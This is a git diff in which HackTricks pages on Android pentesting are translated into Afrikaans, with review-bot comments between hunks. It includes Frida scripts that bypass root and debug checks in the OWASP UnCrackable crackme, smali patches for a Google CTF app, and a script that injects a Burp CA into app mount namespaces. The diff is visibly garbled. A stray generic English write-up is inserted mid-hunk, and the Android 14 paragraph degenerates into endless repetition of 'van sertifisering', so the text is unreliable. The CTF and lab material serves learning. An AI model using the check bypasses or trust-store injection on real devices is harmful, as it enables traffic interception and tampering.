-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-​If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hack-loopbaan** en die onkraakbare wil kraak - **ons is aan die werf!** (_vloeiende skriftelike en gesproke Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} *** -**This is a summary of the post**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ +**Hierdie is 'n opsomming van die pos**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) -## Solution 1 +## Oplossing 1 -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) - -**Hook the \_exit()**\_ function and **decrypt function** so it print the flag in frida console when you press verify: +Gebaseer op [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +**Haak die \_exit()**\_ funksie en **ontsleutel funksie** sodat dit die vlag in die frida-konsole druk wanneer jy op verify druk: ```javascript Java.perform(function () { - send("Starting hooks OWASP uncrackable1..."); +send("Starting hooks OWASP uncrackable1..."); - function getString(data){ - var ret = ""; - for (var i=0; i < data.length; i++){ - ret += "#" + data[i].toString(); - } - return ret - } +function getString(data){ +var ret = ""; +for (var i=0; i < data.length; i++){ +ret += "#" + data[i].toString(); +} +return ret +} - var aes_decrypt = Java.use("sg.vantagepoint.a.a"); - aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { - send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); - send("Key : " + getString(var_0)); - send("Encrypted : " + getString(var_1)); - var ret = 
this.a.overload("[B","[B").call(this,var_0,var_1); - send("Decrypted : " + getString(ret)); +var aes_decrypt = Java.use("sg.vantagepoint.a.a"); +aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { +send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); +send("Key : " + getString(var_0)); +send("Encrypted : " + getString(var_1)); +var ret = this.a.overload("[B","[B").call(this,var_0,var_1); +send("Decrypted : " + getString(ret)); - var flag = ""; - for (var i=0; i < ret.length; i++){ - flag += String.fromCharCode(ret[i]); - } - send("Decrypted flag: " + flag); - return ret; //[B - }; +var flag = ""; +for (var i=0; i < ret.length; i++){ +flag += String.fromCharCode(ret[i]); +} +send("Decrypted flag: " + flag); +return ret; //[B +}; - var sysexit = Java.use("java.lang.System"); - sysexit.exit.overload("int").implementation = function(var_0) { - send("java.lang.System.exit(I)V // We avoid exiting the application :)"); - }; +var sysexit = Java.use("java.lang.System"); +sysexit.exit.overload("int").implementation = function(var_0) { +send("java.lang.System.exit(I)V // We avoid exiting the application :)"); +}; - send("Hooks installed."); +send("Hooks installed."); }); ``` +## Oplossing 2 -## Solution 2 - -Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) - -**Hook rootchecks** and decrypt function so it print the flag in frida console when you press verify: +Gebaseer op [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) +**Haak wortelkontroles** en ontsleutelfunksie sodat dit die vlag in die frida-konsole druk wanneer jy op verifieer druk: ```javascript Java.perform(function () { - send("Starting hooks OWASP uncrackable1..."); +send("Starting hooks OWASP uncrackable1..."); - function getString(data){ - var ret = ""; - for (var i=0; i < data.length; i++){ - ret += "#" + data[i].toString(); - } - return ret - } +function getString(data){ +var ret = ""; +for 
(var i=0; i < data.length; i++){ +ret += "#" + data[i].toString(); +} +return ret +} - var aes_decrypt = Java.use("sg.vantagepoint.a.a"); - aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { - send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); - send("Key : " + getString(var_0)); - send("Encrypted : " + getString(var_1)); - var ret = this.a.overload("[B","[B").call(this,var_0,var_1); - send("Decrypted : " + getString(ret)); +var aes_decrypt = Java.use("sg.vantagepoint.a.a"); +aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) { +send("sg.vantagepoint.a.a.a([B[B)[B doFinal(enc) // AES/ECB/PKCS7Padding"); +send("Key : " + getString(var_0)); +send("Encrypted : " + getString(var_1)); +var ret = this.a.overload("[B","[B").call(this,var_0,var_1); +send("Decrypted : " + getString(ret)); - var flag = ""; - for (var i=0; i < ret.length; i++){ - flag += String.fromCharCode(ret[i]); - } - send("Decrypted flag: " + flag); - return ret; //[B - }; +var flag = ""; +for (var i=0; i < ret.length; i++){ +flag += String.fromCharCode(ret[i]); +} +send("Decrypted flag: " + flag); +return ret; //[B +}; - var rootcheck1 = Java.use("sg.vantagepoint.a.c"); - rootcheck1.a.overload().implementation = function() { - send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); - return false; - }; +var rootcheck1 = Java.use("sg.vantagepoint.a.c"); +rootcheck1.a.overload().implementation = function() { +send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); +return false; +}; - var rootcheck2 = Java.use("sg.vantagepoint.a.c"); - rootcheck2.b.overload().implementation = function() { - send("sg.vantagepoint.a.c.b()Z Root check 2 HIT! test-keys"); - return false; - }; +var rootcheck2 = Java.use("sg.vantagepoint.a.c"); +rootcheck2.b.overload().implementation = function() { +send("sg.vantagepoint.a.c.b()Z Root check 2 HIT! 
test-keys"); +return false; +}; - var rootcheck3 = Java.use("sg.vantagepoint.a.c"); - rootcheck3.c.overload().implementation = function() { - send("sg.vantagepoint.a.c.c()Z Root check 3 HIT! Root packages"); - return false; - }; +var rootcheck3 = Java.use("sg.vantagepoint.a.c"); +rootcheck3.c.overload().implementation = function() { +send("sg.vantagepoint.a.c.c()Z Root check 3 HIT! Root packages"); +return false; +}; - var debugcheck = Java.use("sg.vantagepoint.a.b"); - debugcheck.a.overload("android.content.Context").implementation = function(var_0) { - send("sg.vantagepoint.a.b.a(Landroid/content/Context;)Z Debug check HIT! "); - return false; - }; +var debugcheck = Java.use("sg.vantagepoint.a.b"); +debugcheck.a.overload("android.content.Context").implementation = function(var_0) { +send("sg.vantagepoint.a.b.a(Landroid/content/Context;)Z Debug check HIT! "); +return false; +}; - send("Hooks installed."); +send("Hooks installed."); }); ``` -
-​​If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackerloopbaan** en die onkraakbare wil kraak - **ons is aan die werf!** (_vloeiend in Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
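Review bot: every line inside the two ```javascript fences in this hunk loses its leading indentation (`-    var aes_decrypt = Java.use("sg.vantagepoint.a.a");` becomes `+var aes_decrypt = Java.use("sg.vantagepoint.a.a");`, and the nested `for`/`if` bodies now sit at column 0), so the translation step is rewriting fenced code instead of passing it through; the scripts still load under Frida, but a translation diff should not touch code blocks at all. Restore the original indentation and make the workflow skip fenced blocks. Two smaller points in the same hunk: the blank lines before `## Oplossing 2` and between `Gebaseer op ...` and the `**Haak ...**` sentence were dropped, which changes the rendered paragraphing; and `**Haak die \_exit()**\_ funksie` carries over the source's stray escaping and wording, while the code actually hooks `java.lang.System.exit(int)` (`sysexit.exit.overload("int")`), so this is the moment to say `System.exit()` in both languages.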
diff --git a/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md index dab44e685..a7f3ffbcc 100644 --- a/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md +++ b/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md @@ -2,92 +2,118 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Download the APK here: +Laai die APK hier af: -I am going to upload the APK to [https://appetize.io/](https://appetize.io) (free account) to see how the apk is behaving: +Ek gaan die APK oplaai na [https://appetize.io/](https://appetize.io) (gratis rekening) om te sien hoe die apk optree: ![](<../../.gitbook/assets/image (46).png>) -Looks like you need to win 1000000 times to get the flag. +Dit lyk asof jy 1000000 keer moet wen om die vlag te kry. -Following the steps from [pentesting Android](./) you can decompile the application to get the smali code and read the Java code using jadx. +Deur die stappe van [pentesting Android](./) te volg, kan jy die toepassing dekompilieer om die smali-kode te kry en die Java-kode te lees met behulp van jadx. -Reading the java code: +Lees die Java-kode: ![](<../../.gitbook/assets/image (47).png>) -It looks like the function that is going print the flag is **m().** +Dit lyk asof die funksie wat die vlag gaan druk **m()** is. -## **Smali changes** +## **Smali-veranderinge** -### **Call m() the first time** - -Lets make the application call m() if the variable _this.o != 1000000_ to do so, just cange the condition: +### **Roep m() die eerste keer aan** +Laat ons die toepassing m() laat roep as die veranderlike _this.o != 1000000_ is, om dit te doen, verander net die voorwaarde: ``` - if-ne v0, v9, :cond_2 +if-ne v0, v9, :cond_2 ``` +/hive/hacktricks/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md -to: +# Shall we play a game? +## Introduction + +In this challenge, we are given an Android application called "Game". The goal is to find a flag hidden within the app. We will use various techniques to analyze the app and uncover the flag. + +## Decompiling the APK + +To begin, we need to decompile the APK file. We can use tools like JADX or apktool to accomplish this. Once decompiled, we can analyze the source code and look for any potential vulnerabilities. 
+ +## Analyzing the Source Code + +After decompiling the APK, we can start analyzing the source code. We should look for any sensitive information that may be hardcoded, such as API keys or passwords. Additionally, we should search for any insecure data storage or communication methods. + +## Reverse Engineering + +If we are unable to find the flag through source code analysis, we can resort to reverse engineering the app. This involves disassembling the APK and analyzing the bytecode. Tools like JADX, JEB, or IDA Pro can be used for this purpose. + +## Dynamic Analysis + +Dynamic analysis involves running the app and monitoring its behavior in real-time. We can use tools like Frida or Xposed to hook into the app and intercept function calls or modify data. This can help us identify any hidden functionality or vulnerabilities. + +## Exploiting Vulnerabilities + +Once we have identified a vulnerability, we can proceed to exploit it. This may involve crafting malicious inputs, bypassing security measures, or manipulating the app's behavior to our advantage. The goal is to gain unauthorized access or extract the flag. + +## Conclusion + +In this challenge, we explored various techniques for analyzing and hacking an Android app. By decompiling the APK, analyzing the source code, reverse engineering, and performing dynamic analysis, we can uncover vulnerabilities and exploit them to achieve our goals. ``` - if-eq v0, v9, :cond_2 +if-eq v0, v9, :cond_2 ``` +![Voor](<../../.gitbook/assets/image (48).png>) -![Before](<../../.gitbook/assets/image (48).png>) +![Na](<../../.gitbook/assets/image (49).png>) -![After](<../../.gitbook/assets/image (49).png>) - -Follow the steps of [pentest Android](./) to recompile and sign the APK. Then, upload it to [https://appetize.io/](https://appetize.io) and lets see what happens: +Volg die stappe van [pentest Android](./) om die APK te herkompilieer en te onderteken. 
Laai dit dan op na [https://appetize.io/](https://appetize.io) en kyk wat gebeur: ![](<../../.gitbook/assets/image (50).png>) -Looks like the flag is written without being completely decrypted. Probably the m() function should be called 1000000 times. +Dit lyk asof die vlag geskryf is sonder om heeltemal ontsluit te word. Waarskynlik moet die m() funksie 1000000 keer geroep word. -**Other way** to do this is to not change the instrucction but change the compared instructions: +**'n Ander manier** om dit te doen, is om nie die instruksie te verander nie, maar om die vergelykingsinstruksies te verander: ![](<../../.gitbook/assets/image (55).png>) -**Another way** is instead of comparing with 1000000, set the value to 1 so this.o is compared with 1: +**'n Ander manier** is om in plaas daarvan met 1000000 te vergelyk, die waarde na 1 te stel sodat this.o met 1 vergelyk word: ![](<../../.gitbook/assets/image (57).png>) -A forth way is to add an instruction to move to value of v9(1000000) to v0 _(this.o)_: +'n Vierde manier is om 'n instruksie by te voeg om die waarde van v9(1000000) na v0 _(this.o)_ te skuif: ![](<../../.gitbook/assets/image (58).png>) ![](<../../.gitbook/assets/image (52).png>) -## Solution +## Oplossing -Make the application run the loop 100000 times when you win the first time. To do so, you only need to create the **:goto\_6** loop and make the application **jump there if `this.o`** does not value 100000\: +Maak die toepassing die lus 100000 keer loop as jy die eerste keer wen. Om dit te doen, hoef jy net die **:goto\_6** lus te skep en die toepassing **daarheen te laat spring as `this.o`** nie die waarde 100000 het nie\: ![](<../../.gitbook/assets/image (59).png>) -You need to do this inside a physical device as (I don't know why) this doesn't work in an emulated device. +Jy moet dit in 'n fisiese toestel doen, want (ek weet nie waarom nie) dit werk nie in 'n geëmuleerde toestel nie.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
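Review bot: this hunk injects text that is not a translation of anything on the page: between the `if-ne v0, v9, :cond_2` and `if-eq v0, v9, :cond_2` snippets it adds a line containing the absolute working path `/hive/hacktricks/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md` followed by a generic English write-up (`# Shall we play a game?`, `## Introduction` through `## Conclusion`) about decompiling, reverse engineering and "exploiting vulnerabilities" that has no counterpart in the `-` lines, which is why the hunk grows from 92 to 118 lines. At the same time the `-to:` line that linked the two snippets is removed, so the before/after of the smali condition change (`if-ne` to `if-eq`) no longer reads. Drop the inserted block, restore `to:` in Afrikaans, and add a guard to the workflow that rejects output containing the working path or more lines than the source. As in the other files, the smali lines lose their leading space (`- if-ne v0, v9, :cond_2` becomes `+if-ne v0, v9, :cond_2`).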
diff --git a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md index 857a1a03d..0cb016e4e 100644 --- a/mobile-pentesting/android-app-pentesting/install-burp-certificate.md +++ b/mobile-pentesting/android-app-pentesting/install-burp-certificate.md @@ -1,27 +1,27 @@ -# Install Burp Certificate +# Installeer Burp-sertifikaat
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## On a Virtual Machine +## Op 'n Virtuele Masjien -First of all you need to download the Der certificate from Burp. You can do this in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ +Eerstens moet jy die Der-sertifikaat van Burp aflaai. Jy kan dit doen in _**Proxy**_ --> _**Options**_ --> _**Import / Export CA certificate**_ ![](<../../.gitbook/assets/image (367).png>) -**Export the certificate in Der format** and lets **transform** it to a form that **Android** is going to be able to **understand.** Note that **in order to configure the burp certificate on the Android machine in AVD** you need to **run** this machine **with** the **`-writable-system`** option.\ -For example you can run it like: +**Voer die sertifikaat uit in Der-formaat** en laat ons dit **omskep** na 'n vorm wat **Android** sal kan **verstaan.** Let daarop dat **om die burp-sertifikaat op die Android-masjien in AVD te konfigureer**, moet jy hierdie masjien **met die** **`-writable-system`**-opsie **uitvoer**.\ +Byvoorbeeld, jy kan dit so uitvoer: {% code overflow="wrap" %} ```bash @@ -29,7 +29,7 @@ C:\Users\\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht ``` {% endcode %} -Then, to **configure burps certificate do**: +Dan, om die sertifikaat van burp te **konfigureer**, doen die volgende: {% code overflow="wrap" %} ```bash 
@@ -44,41 +44,33 @@ adb reboot #Now, reboot the machine ``` {% endcode %} -Once the **machine finish rebooting** the burp certificate will be in use by it! +Sodra die **rekenaar klaar herlaai** het, sal die Burp-sertifikaat deur dit gebruik word! -## Using Magisc +## Gebruik van Magisc -If you **rooted your device with Magisc** (maybe an emulator), and you **can't follow** the previous **steps** to install the Burp cert because the **filesystem is read-only** and you cannot remount it writable, there is another way. +As jy jou toestel met Magisc **geroot** het (dalk 'n emulator), en jy **kan nie** die vorige **stappe** volg om die Burp-sertifikaat te installeer nie omdat die **lêersisteem skryfbeskerming** het en jy dit nie skryfbaar kan maak nie, is daar 'n ander manier. -Explained in [**this video**](https://www.youtube.com/watch?v=qQicUW0svB8) you need to: +Soos verduidelik in [**hierdie video**](https://www.youtube.com/watch?v=qQicUW0svB8) moet jy: -1. **Install a CA certificate**: Just **drag\&drop** the DER Burp certificate **changing the extension** to `.crt` in the mobile so it's stored in the Downloads folder and go to `Install a certificate` -> `CA certificate` +1. **Installeer 'n CA-sertifikaat**: Sleep die DER Burp-sertifikaat **met die verandering van die lêeruitbreiding** na `.crt` in die mobiele toestel sodat dit in die Aflaai-gevorderde gestoor word en gaan na `Installeer 'n sertifikaat` -> `CA-sertifikaat`
-* Check that the certificate was correctly stored going to `Trusted credentials` -> `USER` +* Kontroleer dat die sertifikaat korrek gestoor is deur na `Vertroude legitimasie` -> `GEBRUIKER` te gaan
-2. **Make it System trusted**: Download the Magisc module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (a .zip file), **drag\&drop it** in the phone, go to the **Magics app** in the phone to the **`Modules`** section, click on **`Install from storage`**, select the `.zip` module and once installed **reboot** the phone: +2. **Maak dit Sisteem-vertrou**: Laai die Magisc-module [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) ( 'n .zip-lêer) af, **sleep dit** na die foon, gaan na die **Magics-app** op die foon na die **`Modules`**-afdeling, klik op **`Installeer vanaf stoor`**, kies die `.zip`-module en nadat dit geïnstalleer is, **herlaai** die foon:
-* After rebooting, go to `Trusted credentials` -> `SYSTEM` and check the Postswigger cert is there +* Na herlaaiing, gaan na `Vertroude legitimasie` -> `SISTEEM` en kontroleer of die Postswigger-sertifikaat daar is
-## Post Android 14 - -In the latest Android 14 release, a significant shift has been observed in the handling of system-trusted Certificate Authority (CA) certificates. Previously, these certificates were housed in **`/system/etc/security/cacerts/`**, accessible and modifiable by users with root privileges, which allowed immediate application across the system. However, with Android 14, the storage location has been moved to **`/apex/com.android.conscrypt/cacerts`**, a directory within the **`/apex`** path, which is immutable by nature. - -Attempts to remount the **APEX cacerts path** as writable are met with failure, as the system does not allow such operations. Even attempts to unmount or overlay the directory with a temporary file system (tmpfs) do not circumvent the immutability; applications continue to access the original certificate data regardless of changes at the file system level. This resilience is due to the **`/apex`** mount being configured with PRIVATE propagation, ensuring that any modifications within the **`/apex`** directory do not affect other processes. - -The initialization of Android involves the `init` process, which, upon starting the operating system, also initiates the Zygote process. This process is responsible for launching application processes with a new mount namespace that includes a private **`/apex`** mount, thus isolating changes to this directory from other processes. - -Nevertheless, a workaround exists for those needing to modify the system-trusted CA certificates within the **`/apex`** directory. This involves manually remounting **`/apex`** to remove the PRIVATE propagation, thereby making it writable. The process includes copying the contents of **`/apex/com.android.conscrypt`** to another location, unmounting the **`/apex/com.android.conscrypt`** directory to eliminate the read-only constraint, and then restoring the contents to their original location within **`/apex`**. 
This approach requires swift action to avoid system crashes. To ensure system-wide application of these changes, it is recommended to restart the `system_server`, which effectively restarts all applications and brings the system to a consistent state. - +## Na Android 14 +In die nuutste Android 14 vrystelling is 'n beduidende verskuiwing waargeneem in die hantering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van sertifisering van 
```bash # Create a separate temp directory, to hold the current certificates # Otherwise, when we add the mount we can't read the current certs anymore. @@ -111,10 +103,10 @@ ZYGOTE64_PID=$(pidof zygote64 || true) # Apps inherit the Zygote's mounts at startup, so we inject here to ensure # all newly started apps will see these certs straight away: for Z_PID in "$ZYGOTE_PID" "$ZYGOTE64_PID"; do - if [ -n "$Z_PID" ]; then - nsenter --mount=/proc/$Z_PID/ns/mnt -- \ - /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts - fi +if [ -n "$Z_PID" ]; then +nsenter --mount=/proc/$Z_PID/ns/mnt -- \ +/bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts +fi done # Then we inject the mount into all already running apps, so they 
